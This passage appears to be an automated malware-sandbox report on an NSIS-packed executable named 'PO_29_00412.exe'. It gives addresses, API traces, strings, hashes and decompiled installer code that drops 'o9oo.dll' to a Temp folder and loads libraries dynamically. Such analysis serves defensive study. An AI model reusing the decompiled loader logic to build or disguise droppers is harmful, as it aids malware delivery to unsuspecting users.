                                                                            0x00402f84
                                                                            0x00402f89
                                                                            0x00402f8d
                                                                            0x00402f94
                                                                            0x00402f99
                                                                            0x00402f9b
                                                                            0x00402f9d
                                                                            0x00402f9d
                                                                            0x00402fa1
                                                                            0x00402fa6
                                                                            0x00402fa8
                                                                            0x00403101
                                                                            0x00403143
                                                                            0x00000000
                                                                            0x00403143
                                                                            0x00402fae
                                                                            0x00402fb5
                                                                            0x00403031
                                                                            0x00403035
                                                                            0x00403039
                                                                            0x0040303e
                                                                            0x00000000
                                                                            0x00403035
                                                                            0x00402fbe
                                                                            0x00402fc3
                                                                            0x00402fc6
                                                                            0x00402fcb
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00402fcd
                                                                            0x00402fd4
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00402fd6
                                                                            0x00402fdd
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00402fdf
                                                                            0x00402fe6
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00402fe8
                                                                            0x00402fef
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00402ff1
                                                                            0x00402ff7
                                                                            0x00403000
                                                                            0x00403006
                                                                            0x00403009
                                                                            0x0040300b
                                                                            0x00403011
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403017
                                                                            0x0040301b
                                                                            0x00403023
                                                                            0x00403023
                                                                            0x00403026
                                                                            0x00403029
                                                                            0x0040302b
                                                                            0x0040302d
                                                                            0x0040302d
                                                                            0x00000000
                                                                            0x0040302b
                                                                            0x0040301d
                                                                            0x00403021
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040303f
                                                                            0x0040303f
                                                                            0x00403045
                                                                            0x00403051
                                                                            0x00403051
                                                                            0x00403054
                                                                            0x0040305a
                                                                            0x0040305a
                                                                            0x0040305a
                                                                            0x00403062
                                                                            0x00403062
                                                                            0x00000000
                                                                            0x00403062

                                                                            APIs
                                                                            • GetTickCount.KERNEL32 ref: 00402F05
                                                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\PO_29_00412.exe,00000400), ref: 00402F21
                                                                              • Part of subcall function 00405DC1: GetFileAttributesA.KERNELBASE(00000003,00402F34,C:\Users\user\Desktop\PO_29_00412.exe,80000000,00000003), ref: 00405DC5
                                                                              • Part of subcall function 00405DC1: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405DE7
                                                                            • GetFileSize.KERNEL32(00000000,00000000,0042C000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PO_29_00412.exe,C:\Users\user\Desktop\PO_29_00412.exe,80000000,00000003), ref: 00402F6A
                                                                            • GlobalAlloc.KERNEL32(00000040,0040A130), ref: 004030AC
                                                                            Strings
                                                                            • "C:\Users\user\Desktop\PO_29_00412.exe" , xrefs: 00402EF1
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00402EFB, 004030C4
                                                                            • Null, xrefs: 00402FE8
                                                                            • soft, xrefs: 00402FDF
                                                                            • Error launching installer, xrefs: 00402F41
                                                                            • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00403143
                                                                            • Inst, xrefs: 00402FD6
                                                                            • C:\Users\user\Desktop\PO_29_00412.exe, xrefs: 00402F0B, 00402F1A, 00402F2E, 00402F4B
                                                                            • C:\Users\user\Desktop, xrefs: 00402F4C, 00402F51, 00402F57
                                                                            • Error writing temporary file. Make sure your temp folder is valid., xrefs: 004030F5
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.224713095.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.224707850.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224720434.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224725790.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224731430.0000000000413000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224739553.0000000000422000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224744764.000000000042A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224748908.000000000042D000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                            • String ID: "C:\Users\user\Desktop\PO_29_00412.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\PO_29_00412.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                            • API String ID: 2803837635-594115795
                                                                            • Opcode ID: ca76f8d495ce3895f444a46e92879b513e81ddc2aff1e21a5d111d80dade61e3
                                                                            • Instruction ID: 41f98d992e8437d8d417f3691d947d8f632b5d0a71237712da2b0bb715ca9b84
                                                                            • Opcode Fuzzy Hash: ca76f8d495ce3895f444a46e92879b513e81ddc2aff1e21a5d111d80dade61e3
                                                                            • Instruction Fuzzy Hash: 1B71E131A00259ABDB20AF64DD85B9E3BACEB44355F20803BF911BA2D1C77C9E418B5C
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00401759, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 147stringtimeCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 77%
                                                                            			E00401759(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				CHAR* _t83;
				void* _t85;

				_t75 = __ebx;
				_t82 = E00402BCE(0x31);
				 *(_t85 - 8) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
				_t33 = E00405C2D(_t82);
				_push(_t82);
				_t83 = "uvlcopdlxoed";
				if(_t33 == 0) {
					lstrcatA(E00405BC0(E00406228(_t83, "C:\\Users\\hardz\\AppData\\Local\\Temp")), ??);
				} else {
					E00406228();
				}
				E00406503(_t83);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E0040659C(_t83);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E00405D9C(_t83);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E00405DC1(_t83, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 0xc) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E0040534F(0xffffffe2,  *(_t85 - 8));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x4247e8 =  *0x4247e8 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x4247e8;
						goto L32;
					} else {
						E00406228(0x40ac20, 0x425000);
						E00406228(0x425000, _t83);
						E004062BB(_t75, 0x40ac20, _t83, "C:\Users\hardz\AppData\Local\Temp\nsr1FDB.tmp\o9oo.dll",  *((intOrPtr*)(_t85 - 0x14)));
						E00406228(0x425000, 0x40ac20);
						_t62 = E00405944("C:\Users\hardz\AppData\Local\Temp\nsr1FDB.tmp\o9oo.dll",  *(_t85 - 0x28) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x4247e8 =  &( *0x4247e8->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(_t83);
								_push(0xfffffffa);
								E0040534F();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E0040534F(0xffffffea,  *(_t85 - 8));
				 *0x424814 =  *0x424814 + 1;
				_t43 = E00403192(_t77,  *((intOrPtr*)(_t85 - 0x20)),  *(_t85 - 0xc), _t75, _t75); // executed
				 *0x424814 =  *0x424814 - 1;
				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 0xc), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 0xc)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E004062BB(_t75, _t80, _t83, _t83, 0xffffffee);
					} else {
						E004062BB(_t75, _t80, _t83, _t83, 0xffffffe9);
						lstrcatA(_t83,  *(_t85 - 8));
					}
					_push(0x200010);
					_push(_t83);
					E00405944();
					goto L29;
				}
				goto L33;
			}

















                                                                            0x00401759
                                                                            0x00401760
                                                                            0x00401769
                                                                            0x0040176c
                                                                            0x0040176f
                                                                            0x00401774
                                                                            0x00401775
                                                                            0x0040177c
                                                                            0x00401798
                                                                            0x0040177e
                                                                            0x0040177f
                                                                            0x0040177f
                                                                            0x0040179e
                                                                            0x004017a8
                                                                            0x004017a8
                                                                            0x004017ac
                                                                            0x004017af
                                                                            0x004017b4
                                                                            0x004017b6
                                                                            0x004017b8
                                                                            0x004017bd
                                                                            0x004017bd
                                                                            0x004017c8
                                                                            0x004017c8
                                                                            0x004017d9
                                                                            0x004017db
                                                                            0x004017db
                                                                            0x004017dc
                                                                            0x004017dc
                                                                            0x004017df
                                                                            0x004017e2
                                                                            0x004017e5
                                                                            0x004017e5
                                                                            0x004017ec
                                                                            0x004017fb
                                                                            0x00401800
                                                                            0x00401803
                                                                            0x00401806
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00401808
                                                                            0x0040180b
                                                                            0x00401865
                                                                            0x0040186a
                                                                            0x004015b0
                                                                            0x004027bf
                                                                            0x004027bf
                                                                            0x00402a5a
                                                                            0x00402a5d
                                                                            0x00402a5d
                                                                            0x00000000
                                                                            0x0040180d
                                                                            0x00401813
                                                                            0x0040181e
                                                                            0x0040182b
                                                                            0x00401836
                                                                            0x0040184c
                                                                            0x0040184c
                                                                            0x0040184f
                                                                            0x00000000
                                                                            0x00401855
                                                                            0x00401855
                                                                            0x00401856
                                                                            0x00401873
                                                                            0x00402a63
                                                                            0x00402a63
                                                                            0x00402a63
                                                                            0x00401858
                                                                            0x00401858
                                                                            0x00401859
                                                                            0x00401492
                                                                            0x00402387
                                                                            0x00402387
                                                                            0x00402387
                                                                            0x00401856
                                                                            0x0040184f
                                                                            0x00402a65
                                                                            0x00402a69
                                                                            0x00402a69
                                                                            0x00401883
                                                                            0x00401888
                                                                            0x00401896
                                                                            0x0040189b
                                                                            0x004018a1
                                                                            0x004018a5
                                                                            0x004018a7
                                                                            0x004018af
                                                                            0x004018bb
                                                                            0x004018a9
                                                                            0x004018a9
                                                                            0x004018ad
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004018ad
                                                                            0x004018c4
                                                                            0x004018ca
                                                                            0x004018cc
                                                                            0x00000000
                                                                            0x004018d2
                                                                            0x004018d2
                                                                            0x004018d5
                                                                            0x004018ed
                                                                            0x004018d7
                                                                            0x004018da
                                                                            0x004018e3
                                                                            0x004018e3
                                                                            0x004018f2
                                                                            0x004018f7
                                                                            0x00402382
                                                                            0x00000000
                                                                            0x00402382
                                                                            0x00000000

                                                                            APIs
                                                                            • lstrcatA.KERNEL32(00000000,00000000,uvlcopdlxoed,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401798
                                                                            • CompareFileTime.KERNEL32(-00000014,?,uvlcopdlxoed,uvlcopdlxoed,00000000,00000000,uvlcopdlxoed,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017C2
                                                                              • Part of subcall function 00406228: lstrcpynA.KERNEL32(?,?,00000400,00403533,00423F40,NSIS Error,?,00000007,00000009,0000000B), ref: 00406235
                                                                              • Part of subcall function 0040534F: lstrlenA.KERNEL32(00420530,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 00405388
                                                                              • Part of subcall function 0040534F: lstrlenA.KERNEL32(00402EC9,00420530,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 00405398
                                                                              • Part of subcall function 0040534F: lstrcatA.KERNEL32(00420530,00402EC9,00402EC9,00420530,00000000,00000000,00000000), ref: 004053AB
                                                                              • Part of subcall function 0040534F: SetWindowTextA.USER32(00420530,00420530), ref: 004053BD
                                                                              • Part of subcall function 0040534F: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004053E3
                                                                              • Part of subcall function 0040534F: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004053FD
                                                                              • Part of subcall function 0040534F: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040540B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.224713095.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.224707850.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224720434.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224725790.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224731430.0000000000413000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224739553.0000000000422000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224744764.000000000042A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224748908.000000000042D000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                            • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsr1FDB.tmp\o9oo.dll$uvlcopdlxoed
                                                                            • API String ID: 1941528284-3201456305
                                                                            • Opcode ID: ebc504ea436e693e663a4b144fd74c24bb863413e05106ae1afc4e96b16114fd
                                                                            • Instruction ID: 94ce822b9f6a6483fb8de35dc0b51f709499be211a85e0d844596cfba341e8bc
                                                                            • Opcode Fuzzy Hash: ebc504ea436e693e663a4b144fd74c24bb863413e05106ae1afc4e96b16114fd
                                                                            • Instruction Fuzzy Hash: 0541B931900515BACF107BB5DC45EAF7AB8DF05369B60863FF422B11E1CA7C8A528A6D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 031111FF, Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 323memoryfileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VirtualAlloc.KERNELBASE(00000000,1C200000,00003000,00000004,?,050A26AF,00000000), ref: 031114DA
                                                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 03111536
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.225530478.0000000003110000.00000040.00000001.sdmp, Offset: 03110000, based on PE: false
                                                                            Similarity
                                                                            • API ID: AllocCreateFileVirtual
                                                                            • String ID: c5c7af576be944e0aa2e746e357a3fb9
                                                                            • API String ID: 1475775534-3637376375
                                                                            • Opcode ID: 5ade5532df2fea51b39ff0bf406c6707437528124e29fde701d34444813d4af4
                                                                            • Instruction ID: fec51a569ce5c9bbba43935689c100a84947d724bcba89c684690324508e099c
                                                                            • Opcode Fuzzy Hash: 5ade5532df2fea51b39ff0bf406c6707437528124e29fde701d34444813d4af4
                                                                            • Instruction Fuzzy Hash: D8D15E34D54398EEEF21CBE4DC15BEDBBB5AF08700F1440AAE608FA191D7B60A94DB15
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0311072D, Relevance: 10.7, APIs: 7, Instructions: 237fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 0311082F
                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 031109FC
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.225530478.0000000003110000.00000040.00000001.sdmp, Offset: 03110000, based on PE: false
                                                                            Similarity
                                                                            • API ID: CreateFileFreeVirtual
                                                                            • String ID:
                                                                            • API String ID: 204039940-0
                                                                            • Opcode ID: 0036ea6334bc8bca3e3757f249063073b3ccac8af64edf4487454f47d4e5ab2b
                                                                            • Instruction ID: b515387b51dad33ea788930b33d943f3418cbcf6dbc989a85c2a3e43f73a6698
                                                                            • Opcode Fuzzy Hash: 0036ea6334bc8bca3e3757f249063073b3ccac8af64edf4487454f47d4e5ab2b
                                                                            • Instruction Fuzzy Hash: 23A10274E0021DEFEF10DBE4C995BEDBBB1AF08311F24806AE515BA290D7755AA0DB10
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00405815, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E00405815(CHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x408384;
				_v36.Group = 0x408384;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x408374;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







                                                                            0x00405820
                                                                            0x00405824
                                                                            0x00405827
                                                                            0x0040582d
                                                                            0x00405831
                                                                            0x00405835
                                                                            0x0040583d
                                                                            0x00405844
                                                                            0x0040584a
                                                                            0x00405851
                                                                            0x00405858
                                                                            0x00405860
                                                                            0x00405862
                                                                            0x00000000
                                                                            0x00405862
                                                                            0x0040586c
                                                                            0x00405873
                                                                            0x00405889
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040588b
                                                                            0x0040588f

                                                                            APIs
                                                                            • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405858
                                                                            • GetLastError.KERNEL32 ref: 0040586C
                                                                            • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405881
                                                                            • GetLastError.KERNEL32 ref: 0040588B
                                                                            Strings
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 0040583B
                                                                            • C:\Users\user\Desktop, xrefs: 00405815
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.224713095.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.224707850.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224720434.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224725790.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224731430.0000000000413000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224739553.0000000000422000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224744764.000000000042A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224748908.000000000042D000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                                            • API String ID: 3449924974-3254906087
                                                                            • Opcode ID: df2ca303ac227c9e0d0fbc5e27afd1aa0bff8a01fb2d8cf1edb312bec269ebc1
                                                                            • Instruction ID: d6c2dc8a5c3265a730c97c9ba519fe28ff3708ad137b47d6a6340678ab851e8b
                                                                            • Opcode Fuzzy Hash: df2ca303ac227c9e0d0fbc5e27afd1aa0bff8a01fb2d8cf1edb312bec269ebc1
                                                                            • Instruction Fuzzy Hash: 60011A72D00219DADF10DFA1C944BEFBBB8EF04354F04803ADA45B6290E7789658CF99
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004065C3, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E004065C3(intOrPtr _a4) {
				char _v292;
				int _t10;
				struct HINSTANCE__* _t14;
				void* _t16;
				void* _t21;

				_t10 = GetSystemDirectoryA( &_v292, 0x104);
				if(_t10 > 0x104) {
					_t10 = 0;
				}
				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
					_t16 = 1;
				} else {
					_t16 = 0;
				}
				_t5 = _t16 + 0x40a014; // 0x5c
				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
				return _t14;
			}








                                                                            0x004065da
                                                                            0x004065e3
                                                                            0x004065e5
                                                                            0x004065e5
                                                                            0x004065e9
                                                                            0x004065fb
                                                                            0x004065f5
                                                                            0x004065f5
                                                                            0x004065f5
                                                                            0x004065ff
                                                                            0x00406613
                                                                            0x00406627
                                                                            0x0040662e

                                                                            APIs
                                                                            • GetSystemDirectoryA.KERNEL32 ref: 004065DA
                                                                            • wsprintfA.USER32 ref: 00406613
                                                                            • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406627
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.224713095.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.224707850.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224720434.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224725790.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224731430.0000000000413000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224739553.0000000000422000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224744764.000000000042A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224748908.000000000042D000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                            • String ID: %s%s.dll$UXTHEME$\
                                                                            • API String ID: 2200240437-4240819195
                                                                            • Opcode ID: dd037f00298a2975fe7e642a10d0852ddcb34bcb2038a79f7270f2bd0b83f80d
                                                                            • Instruction ID: 9188928b716331f4199fdf2d451d87d069fed8801fbff73d7d84d2de41a49ecb
                                                                            • Opcode Fuzzy Hash: dd037f00298a2975fe7e642a10d0852ddcb34bcb2038a79f7270f2bd0b83f80d
                                                                            • Instruction Fuzzy Hash: D9F0F6706006097BEB249B68ED0DFEB365CAB08304F1404BEA186E10D1EA78D8358BA9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040209D, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 60%
                                                                            			E0040209D(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t26;
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x424818");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x4247e8 =  *0x4247e8 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E00402BCE(0xfffffff0);
				 *(_t34 + 8) = E00402BCE(1);
				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
					_t30 = _t18;
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E0040534F(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x425000, 0x40b860, "�GB"); // executed
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x20)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E004039DB(_t30) != 0) {
						FreeLibrary(_t30);
					}
					goto L16;
				}
				_t26 = GetModuleHandleA(_t32); // executed
				_t30 = _t26;
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}










                                                                            0x0040209d
                                                                            0x0040209d
                                                                            0x004020a2
                                                                            0x004020a9
                                                                            0x00402164
                                                                            0x004022dd
                                                                            0x004022dd
                                                                            0x00402a5a
                                                                            0x00402a5d
                                                                            0x00402a69
                                                                            0x00402a69
                                                                            0x004020b8
                                                                            0x004020c2
                                                                            0x004020c5
                                                                            0x004020d4
                                                                            0x004020d8
                                                                            0x004020de
                                                                            0x004020e2
                                                                            0x0040215d
                                                                            0x00000000
                                                                            0x0040215d
                                                                            0x004020e4
                                                                            0x004020ed
                                                                            0x004020f1
                                                                            0x00402135
                                                                            0x004020f3
                                                                            0x004020f6
                                                                            0x004020f9
                                                                            0x00402129
                                                                            0x004020fb
                                                                            0x004020fe
                                                                            0x00402107
                                                                            0x00402109
                                                                            0x00402109
                                                                            0x00402107
                                                                            0x004020f9
                                                                            0x0040213d
                                                                            0x00402152
                                                                            0x00402152
                                                                            0x00000000
                                                                            0x0040213d
                                                                            0x004020c8
                                                                            0x004020ce
                                                                            0x004020d2
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000

                                                                            APIs
                                                                            • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 004020C8
                                                                              • Part of subcall function 0040534F: lstrlenA.KERNEL32(00420530,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 00405388
                                                                              • Part of subcall function 0040534F: lstrlenA.KERNEL32(00402EC9,00420530,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 00405398
                                                                              • Part of subcall function 0040534F: lstrcatA.KERNEL32(00420530,00402EC9,00402EC9,00420530,00000000,00000000,00000000), ref: 004053AB
                                                                              • Part of subcall function 0040534F: SetWindowTextA.USER32(00420530,00420530), ref: 004053BD
                                                                              • Part of subcall function 0040534F: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004053E3
                                                                              • Part of subcall function 0040534F: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004053FD
                                                                              • Part of subcall function 0040534F: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040540B
                                                                            • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 004020D8
                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 004020E8
                                                                            • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402152
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.224713095.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.224707850.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224720434.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224725790.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224731430.0000000000413000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224739553.0000000000422000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224744764.000000000042A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224748908.000000000042D000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                            • String ID: GB
                                                                            • API String ID: 2987980305-3285937634
                                                                            • Opcode ID: 621d8ec26b05587c79b2cea071fc8b0623d7a7a062788e3185bb13ecc113f1ec
